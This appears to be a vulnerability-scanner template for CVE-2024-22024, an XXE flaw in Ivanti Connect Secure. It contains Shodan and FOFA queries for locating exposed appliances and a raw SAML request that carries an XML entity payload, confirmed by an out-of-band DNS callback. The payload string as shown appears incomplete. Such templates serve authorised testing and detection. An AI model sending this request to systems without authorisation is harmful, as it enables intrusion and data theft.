id: CVE-2024-22024 info: name: Ivanti Connect Secure - XXE author: watchTowr severity: high description: | Ivanti Connect Secure is vulnerable to XXE (XML External Entity) injection. impact: | Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information or remote code execution. remediation: | Apply the latest security patches or updates provided by Ivanti to fix the XXE vulnerability. reference: - https://labs.watchtowr.com/are-we-now-part-of-ivanti/ - https://twitter.com/h4x0r_dz/status/1755849867149103106/photo/1 classification: epss-score: 0.94249 epss-percentile: 0.99933 metadata: max-request: 1 vendor: ivanti product: connect_secure shodan-query: - "html:\"welcome.cgi?p=logo\"" - http.title:"ivanti connect secure" - http.html:"welcome.cgi?p=logo" fofa-query: - body="welcome.cgi?p=logo" - title="ivanti connect secure" google-query: intitle:"ivanti connect secure" tags: cve,cve2024,xxe,ivanti,vkev,vuln variables: payload: ' %watchTowr;]>' http: - raw: - | POST /dana-na/auth/saml-sso.cgi HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded SAMLRequest={{base64(payload)}} matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" - type: word part: body words: - '/dana-na/' - 'WriteCSS' condition: and # digest: 4a0a0047304502201405de894d406527bc454e7ba94e90568ab1e3e5a4660960c347581f24408f740221009e76a405f848d7a17c5f388c6c21cb6c0a94af3e6201cd218d72af5eaf70ca3e:922c64590222798bb761d5b6d8e72950